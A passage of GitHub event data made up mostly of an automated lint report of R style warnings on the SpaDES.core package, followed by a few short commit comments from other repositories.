^\n```\n[R/code-checking.R:516:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n                 ^\n```\n[R/code-checking.R:518:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                 ^\n```\n[R/code-checking.R:518:23:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                      ^\n```\n[R/code-checking.R:661:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L661) *style:* **Commented code should be removed.**\n```r\n​    #unique(pd[outerWh, \"line1\"])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:665:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                 ^\n```\n[R/code-checking.R:665:64:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                               ^\n```\n[R/code-checking.R:665:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L665) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                                              ^\n```\n[R/copy.R:37:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/copy.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            sim_ <- object\n            ^~~~\n```\n[R/downloadData.R:54:96:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/downloadData.R#L54) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    io <- .parseModulePartial(sim, modules = list(module), defineModuleElement = \"inputObjects\" )\n                                                                                               ^\n```\n[R/downloadData.R:242:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/downloadData.R#L242) *style:* **Commented code should be removed.**\n```r\n​    # parsedModule <- parse(file = file.path(path, module, paste0(module, '.R')))\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:243:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/downloadData.R#L243) *style:* **Commented code should be removed.**\n```r\n​    # urls <- .getSourceURL(pattern = fileToDownload, x = parsedModule)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:250:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/downloadData.R#L250) *style:* **Commented code should be removed.**\n```r\n​      #urls <- moduleMetadata(module, path)$inputObjects$sourceURL\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:268:27:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/downloadData.R#L268) *style:* **Commas should always have a space after.**\n```r\n​    chksums2 <- chksums[0,]\n                          ^\n```\n[R/downloadData.R:269:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/downloadData.R#L269) *style:* **Commented code should be removed.**\n```r\n​    #children <- moduleMetadata(module, path)$childModules\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:272:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n            ^\n```\n[R/downloadData.R:272:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                 ^\n```\n[R/downloadData.R:272:54:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                     ^\n```\n[R/downloadData.R:272:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                       ^\n```\n[R/experiment.R:200:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/experiment.R#L200) *style:* **Commented code should be removed.**\n```r\n​    #sim <- Copy(sim, objects = FALSE, queues = TRUE)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:215:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/experiment.R#L215) *style:* **Commented code should be removed.**\n```r\n​    # cl <- tryCatch(getCluster(), error = function(x) NULL)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:216:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/experiment.R#L216) *style:* **Commented code should be removed.**\n```r\n​    # on.exit(if (!is.null(cl)) returnCluster(), add = TRUE)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:218:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/experiment.R#L218) *style:* **Commented code should be removed.**\n```r\n​    #if (length(modules) == 0) modules <- list(modules(sim)[-(1:4)])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:222:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/experiment.R#L222) *style:* **Commented code should be removed.**\n```r\n​        # unlist(params[paramsTmp], recursive = FALSE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:314:58:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/experiment.R#L314) *style:* **Commented code should be removed.**\n```r\n​            params(sim_)[[mod[x]]][[param[[x]]]] <- val #factorialExp[ind,x]\n                                                         ^~~~~~~~~~~~~~~~~~~\n```\n[R/helpers.R:230:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/helpers.R#L230) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​                             paste0(\"package:\", .pkgEnv$corePackagesVec[-(1:2)]))\n                                                                         ^\n```\n[R/helpers.R:260:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/helpers.R#L260) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​all.equal.simList <- function(target, current, ...) {\n^~~~~~~~~~~~~~~~~\n```\n[R/load.R:198:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/load.R#L198) *style:* **Lines should not be more than 100 characters.**\n```r\n​                names(argument) <- c(nam, names(formals(getFromNamespace(loadFun[y], loadPackage[y])))[1])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/misc-methods.R:467:55:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/misc-methods.R#L467) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          (inherits(get(w, envir = envir), \"integer\")) ) {\n                                                      ^\n```\n[R/module-define.R:719:63:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/module-define.R#L719) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      exts <- na.omit(match(file_ext(fl), .fileExts[, \"exts\"]) )\n                                                              ^\n```\n[R/module-dependencies-class.R:53:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/module-dependencies-class.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            out.df <- data.frame(\n            ^~~~~~\n```\n[R/module-dependencies-class.R:172:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/module-dependencies-class.R#L172) *style:* **Commented code should be removed.**\n```r\n​    #   warning(\"input object data.frame should use colnames sourceURL.\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-dependencies-class.R:174:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n        ^\n```\n[R/module-dependencies-class.R:174:78:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n                                                                             ^\n```\n[R/module-dependencies-methods.R:43:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/module-dependencies-methods.R#L43) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- .depsEdgeListMem(deps, plot)\n    ^~\n```\n[R/module-dependencies-methods.R:56:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n  ^~~~~~\n```\n[R/module-dependencies-methods.R:56:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n            ^~~~~~~\n```\n[R/module-dependencies-methods.R:61:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/module-dependencies-methods.R#L61) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.in <- as.data.table(x@inputObjects)[, .(objectName, objectClass)]\n      ^~~~\n```\n[R/module-dependencies-methods.R:62:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/module-dependencies-methods.R#L62) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.out <- as.data.table(x@outputObjects)[, .(objectName, objectClass)]\n      ^~~~~\n```\n[R/module-dependencies-methods.R:65:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/module-dependencies-methods.R#L65) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.in <<- rbindlist(list(sim.in, z.in), use.names = TRUE)\n        ^~~~~~\n```\n[R/module-dependencies-methods.R:68:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/module-dependencies-methods.R#L68) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.out <<- rbindlist(list(sim.out, z.out), use.names = TRUE)\n        ^~~~~~~\n```\n[R/module-dependencies-methods.R:80:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/module-dependencies-methods.R#L80) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- dx[, list(from = module, to = i.module,\n    ^~\n```\n[R/module-dependencies-methods.R:83:15:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/module-dependencies-methods.R#L83) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (plot) DT <- DT[!duplicated(DT[, 1:2, with = FALSE]), ]\n              ^~\n```\n[R/module-dependencies-methods.R:85:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/module-dependencies-methods.R#L85) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- data.table(from = character(0), to = character(0),\n    ^~\n```\n[R/module-dependencies-methods.R:164:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/module-dependencies-methods.R#L164) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    M <- distances(simGraph, mode = \"out\")\n    ^\n```\n[R/module-dependencies-methods.R:196:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/module-dependencies-methods.R#L196) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​      missingObjects <- simEdgeList %>% filter(from != to) %>%\n                                    ~~^\n```\n[R/module-dependencies-methods.R:210:26:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/module-dependencies-methods.R#L210) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​    return(newEdgeList %>% data.table() %>% setorder(\"from\", \"to\", \"objName\"))\n                       ~~^\n```\n[R/module-dependencies-methods.R:246:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/module-dependencies-methods.R#L246) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​              loadOrder <- names(simGraph[[tsort, ]]) %>% .[!(. %in% \"_INPUT_\" )]\n                                                                              ^\n```\n[R/module-repository.R:28:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/module-repository.R#L28) *style:* **Lines should not be more than 100 characters.**\n```r\n​#'          (\\url{http://spades-core.predictiveecology.org/articles/ii-modules.html#module-directory-structure-modulename}),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:52:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/module-repository.R#L52) *style:* **Lines should not be more than 100 characters.**\n```r\n​    zipFiles <- grep(file.path(name, \"data\"), zipFiles, invert = TRUE, value = TRUE) # remove any zip in data folder\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:293:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/module-repository.R#L293) *style:* **Commented code should be removed.**\n```r\n​      #versionWarning(name, version)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:305:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/module-repository.R#L305) *style:* **Lines should not be more than 100 characters.**\n```r\n​        GET(zip, ua, config = list(config(token = pat)), write_disk(localzip, overwrite = overwrite))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:401:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/module-repository.R#L401) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/module-repository.R:402:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/module-repository.R#L402) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/moduleMetadata.R:75:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/moduleMetadata.R#L75) *style:* **Commented code should be removed.**\n```r\n​    #metadata <- eval(parse(text = x)) # can't be used because can't evaluate start(sim)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:78:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/plotting-diagrams.R#L78) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- tail(completed(sim), n)\n    ^~\n```\n[R/plotting-diagrams.R:173:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/plotting-diagrams.R#L173) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​        sapply(ll, NROW) %>% sum() %>% `*`(., 26L)\n                         ~~^\n```\n[R/plotting-diagrams.R:325:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/plotting-diagrams.R#L325) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      PlotRemovingDots <- function(modDia, plotFn, axes, ...,\n      ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:326:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/plotting-diagrams.R#L326) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.color,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:327:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/plotting-diagrams.R#L327) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size,\n                                   ^~~~~~~~~~~\n```\n[R/plotting-diagrams.R:328:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/plotting-diagrams.R#L328) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size2,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:329:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/plotting-diagrams.R#L329) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.shape,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:330:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/plotting-diagrams.R#L330) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.cex,\n                                   ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:331:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/plotting-diagrams.R#L331) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.family,\n                                   ^~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:345:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/plotting-diagrams.R#L345) *style:* **Lines should not be more than 100 characters.**\n```r\n​          c(nchar(namesModDia)^0.8 * 10) # use exponential to stretch out, and multiplication to make all bigger\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting.R:6:31:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                              ^~~~~~~~\n```\n[R/plotting.R:6:41:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                                        ^~~~~~~~~~\n```\n[R/plotting.R:37:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                        ^~~~~~~~\n```\n[R/plotting.R:37:35:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                                  ^~~~~~~~~~\n```\n[R/plotting.R:86:22:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                    ~^~\n```\n[R/plotting.R:86:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                                                      ~^~\n```\n[R/plotting.R:87:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n          ~^~\n```\n[R/plotting.R:87:40:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                      ~^~\n```\n[R/plotting.R:87:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                                                        ~^~\n```\n[R/POM.R:128:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/POM.R#L128) *style:* **Lines should not be more than 100 characters.**\n```r\n​#' @param objFnCompare Character string. Either, \"MAD\" or \"RMSE\" indicating that inside the objective\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:186:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/POM.R#L186) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​           NaNRetries = NA, logObjFnVals = FALSE, weights, useLog = FALSE) {\n           ^~~~~~~~~~\n```\n[R/POM.R:196:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/POM.R#L196) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        NaNRetries, logObjFnVals, weights, useLog) {\n                        ^~~~~~~~~~\n```\n[R/POM.R:213:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/POM.R#L213) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (is.na(NaNRetries)) NaNRetries <- 1\n                           ^~~~~~~~~~\n```\n[R/POM.R:237:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/POM.R#L237) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​          sim_ <- Copy(sim)\n          ^~~~\n```\n[R/POM.R:255:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/POM.R#L255) *style:* **Put spaces around all infix operators.**\n```r\n​          envPOMCalled <- sys.frame(min(grep(\"POM\", sys.calls()))-1)\n                                                                ~^~\n```\n[R/POM.R:322:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/POM.R#L322) *style:* **Lines should not be more than 100 characters.**\n```r\n​          cat(format(unlist(lapply(objectiveRes, function(x) x[[\"value\"]])), digits = 4), dep = \"\\t\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:360:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/POM.R#L360) *style:* **Lines should not be more than 100 characters.**\n```r\n​      par[whP] <- unlist(deps[[modName]]@parameters$default[deps[[modName]]@parameters$paramName == names(P(sim, modName)[whParamsByMod[whP]])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n"}},"created_at":"2018-07-28T00:11:00Z"}
{"id":"8031320053","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29865261,"position":null,"line":null,"path":null,"commit_id":"8c86b92171aa9fe6af8176955db57e13d22351f5","created_at":"2018-07-28T00:14:29Z","updated_at":"2018-07-28T00:14:29Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/8c86b92171aa9fe6af8176955db57e13d22351f5/index.html"}},"created_at":"2018-07-28T00:14:29Z"}
{"id":"8031321295","type":"CommitCommentEvent","actor":{"login":"TisonKun"},"repo":{"name":"HoshinoTented/LearningCpp"},"payload":{"comment":{"id":29865263,"position":null,"line":null,"path":null,"commit_id":"bb2ea6eb07bb3b2520197f9b2a406e0e2cbfb681","created_at":"2018-07-28T00:15:15Z","updated_at":"2018-07-28T00:15:15Z","author_association":"NONE","body":"真的不是 laji 吗"}},"created_at":"2018-07-28T00:15:15Z"}
{"id":"8031324328","type":"CommitCommentEvent","actor":{"login":"Ericson2314"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29865271,"position":85,"line":147,"path":"pkgs/stdenv/generic/make-derivation.nix","commit_id":"7f3ca3e21a22fd3101b40cadb86899542dec2e35","created_at":"2018-07-28T00:16:59Z","updated_at":"2018-07-28T00:16:59Z","author_association":"MEMBER","body":"Thanks. Fixed on staging"}},"created_at":"2018-07-28T00:16:59Z"}
